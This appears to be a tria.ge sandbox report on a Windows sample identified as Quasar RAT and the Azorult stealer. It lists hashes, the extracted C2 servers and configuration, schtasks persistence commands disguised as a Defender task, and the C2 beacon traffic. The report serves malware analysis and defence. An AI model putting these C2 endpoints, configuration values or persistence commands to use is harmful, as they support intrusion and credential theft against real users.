Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    3s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24/01/2025, 03:05 UTC

General

  • Target

    5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe

  • Size

    2.0MB

  • MD5

    991fbae4fb220876924d5398a8252a60

  • SHA1

    e98704697dc895376a7a77ed5eca8a84cd312a62

  • SHA256

    5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fb

  • SHA512

    c89c7aba766d9349ad7f8006583fc52f173819ef8b40d1384123ef8816c810c9cae4f956e23857c38823f0faa8033b42effc53ac9ff8718e0523e266329de86b

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYr:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YJ

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 13 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe
    "C:\Users\Admin\AppData\Local\Temp\5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1740
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
          PID:2920
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 180
          3⤵
          • Loads dropped DLL
          • Program crash
          PID:2744
      • C:\Users\Admin\AppData\Local\Temp\windef.exe
        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2448
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:692
        • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
          "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2436
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2972
      • C:\Users\Admin\AppData\Local\Temp\5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe
        "C:\Users\Admin\AppData\Local\Temp\5ec08c922d9d3526baf055eaa068deb739de26d09c0c0bbc39901c5f869c53fbN.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2812
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
        2⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2768

    Network

    • flag-us
      DNS
      ip-api.com
      windef.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json/
      windef.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 24 Jan 2025 03:05:34 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 291
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
    • flag-us
      GET
      http://ip-api.com/json/
      Remote address:
      208.95.112.1:80
      Request
      GET /json/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 24 Jan 2025 03:05:35 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 291
      Access-Control-Allow-Origin: *
      X-Ttl: 58
      X-Rl: 43
    • flag-us
      DNS
      0x21.in
      Remote address:
      8.8.8.8:53
      Request
      0x21.in
      IN A
      Response
      0x21.in
      IN A
      44.221.84.105
    • flag-us
      POST
      http://0x21.in:8000/_az/
      Remote address:
      44.221.84.105:8000
      Request
      POST /_az/ HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Host: 0x21.in:8000
      Content-Length: 107
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Jan 2025 03:05:36 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=e3bfa89758683bf1ecae9cf253d691f9|181.215.176.83|1737687936|1737687936|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    • flag-us
      DNS
      0x21.in
      Remote address:
      8.8.8.8:53
      Request
      0x21.in
      IN A
      Response
      0x21.in
      IN A
      44.221.84.105
    • flag-us
      POST
      http://0x21.in/_az/
      Remote address:
      44.221.84.105:8000
      Request
      POST /_az/ HTTP/1.0
      Host: 0x21.in
      Connection: close
      User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Content-Length: 107
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Jan 2025 03:05:36 GMT
      Content-Type: text/html
      Connection: close
      Set-Cookie: btst=58ca5876a8d8dc8884c6639246dd2755|181.215.176.83|1737687936|1737687936|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    • 208.95.112.1:80
      http://ip-api.com/json/
      http
      windef.exe
      328 B
      560 B
      4
      2

      HTTP Request

      GET http://ip-api.com/json/

      HTTP Response

      200
    • 208.95.112.1:80
      http://ip-api.com/json/
      http
      374 B
      560 B
      5
      2

      HTTP Request

      GET http://ip-api.com/json/

      HTTP Response

      200
    • 44.221.84.105:8000
      http://0x21.in:8000/_az/
      http
      491 B
      870 B
      5
      5

      HTTP Request

      POST http://0x21.in:8000/_az/

      HTTP Response

      200
    • 5.8.88.191:443
      152 B
      3
    • 44.221.84.105:8000
      http://0x21.in/_az/
      http
      480 B
      590 B
      5
      5

      HTTP Request

      POST http://0x21.in/_az/

      HTTP Response

      200
    • 8.8.8.8:53
      ip-api.com
      dns
      windef.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      0x21.in
      dns
      53 B
      69 B
      1
      1

      DNS Request

      0x21.in

      DNS Response

      44.221.84.105

    • 8.8.8.8:53
      0x21.in
      dns
      53 B
      69 B
      1
      1

      DNS Request

      0x21.in

      DNS Response

      44.221.84.105

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \Users\Admin\AppData\Local\Temp\vnc.exe

      Filesize

      405KB

      MD5

      b8ba87ee4c3fc085a2fed0d839aadce1

      SHA1

      b3a2e3256406330e8b1779199bb2b9865122d766

      SHA256

      4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

      SHA512

      7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

    • \Users\Admin\AppData\Local\Temp\windef.exe

      Filesize

      349KB

      MD5

      b4a202e03d4135484d0e730173abcc72

      SHA1

      01b30014545ea526c15a60931d676f9392ea0c70

      SHA256

      7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

      SHA512

      632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

    • memory/1740-41-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

      Filesize

      4KB

    • memory/1740-61-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

      Filesize

      4KB

    • memory/2436-57-0x0000000000130000-0x000000000018E000-memory.dmp

      Filesize

      376KB

    • memory/2448-45-0x00000000012C0000-0x000000000131E000-memory.dmp

      Filesize

      376KB

    • memory/2812-39-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/2812-35-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

      Filesize

      4KB

    • memory/2812-29-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/2812-28-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.